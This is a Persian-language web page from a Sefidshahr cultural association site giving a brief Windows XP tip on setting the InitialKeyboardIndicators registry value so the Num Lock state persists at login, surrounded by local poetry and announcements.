یک مقدار رشته ای ( برای اینکار Right click در بخش راست رجیستری و انتخاب گزینه String Value ) به نام InitialKeyboardIndicators ( این مقدار به طور پیش فرض با مقدار صفر در ویندوز XP موجود است ، در صورت عدم وجود این رشته عینا رشته ای با همین اسم بسازید ) ساخته و به آن مقدار 2 بدهید. مقدار 2 باعث میشود که ویندوز آخرین وضعیت کلید Num Lock را ضبط کند و در زمان ورود بعدی شما به ویندوز آخرین وضعیت قبلی این کلید را اجرا کند و مقدار صفر ، کلید Num Lock را هنگام ورود به ویندوز خاموش نگه خواهد داشت.


موضوع: كامپيوتر
نویسنده: گروه خبری یاس
تاریخ درج چهارشنبه 10 بهمن 1486
کلیدواژه ها: ترفندهای ویندوز

آخرین مقالات سایت:

جستجو: در


  بحث روز


  آخرین مطالب سایت



موضوع بندی اخبار

ویژه ها

موضوع بندی مقالات


  تبلیغات

سرمایه ذوق اهل این آبادی ملاعلی فاضل نصرابادی (سروده عبدالجبار کاکاوند در جریان کنگره فضل نبی در سفیدشهر )

الهی برآید از آن دوده دود

که نام محمد برد بی درود

ملافضل علی نصرابادی


 ملافضل علی نصرابادی؛ شاعر بی بدیل سفیدشهر  


فرقی نکند برای ما، به جان اصغـــر

عشق است ابوالفضل وحسین وعلی اکبر

سفیدشهر  همدل و یکصدا


مجمع فرهنگی سفیدشهر منتشر کرد:

پس از چاپ کتاب تاریخ سفیدشهر و ستارگان سپهر سفیدشهر، اینک کتاب

 گلچین مثنوی مجلس افروز منتخبی از اشعار مثنوی مجلس افروز چاپ و روانه بازار شد. 

ناشر : انتشارات مجلس افروز 

قیمت 3500تومان با تخفیف،

محل عرضه:  فروشگاه ولایت،جنب مسجد جامع سفیدشهر 03154833092


سامانه پیام کوتاه مجمع فرهنگی سفید شهر به شماره 30007093 راه اندازی شد .منتظر انتقادات و پیشنهادات همشهریان عزیز هستیم.


سفیدشــــهر، دیار ملافضل علی نصرابادی

سفیدشهر؛  شهر طلای سپید


"فروشگاه فرهنگی ولایت "اولین مرکز فروش  کتاب و محصولات فرهنگي سفیدشهر:  انواع كتاب، سي دي مذهبي،نوشت افزار و ...

 آدرس:  جنب مسجد جامع سفیدشهر



  نظرسنجی

مراسم سوگوای عصر عاشورای سفیدشهر چگونه است ؟
نیازبه همدلی و وحدت دارد
خیلی خوب است
بسیار عالی است
می تواند بهتر از این باشد

نمایش نتیجه


  آمار سایت

آنلاین: 16 نفر
زمان بارگزاری این صفحه: 0/16 ثانیه

جهت مشاهده جزئیات بیشتر از آمار سایت کلیک کنید.

کلیه حقوق مادی و معنوی این سایت، متعلق به مجمع فرهنگی سفیدشهر می باشد.| برداشت مطالب با ذکر منبع بلامانع می باشد. | info@SefidShahrMF.ir


طراحی و پیاده سازی: فرتک -فکور رایانه توسعه کویر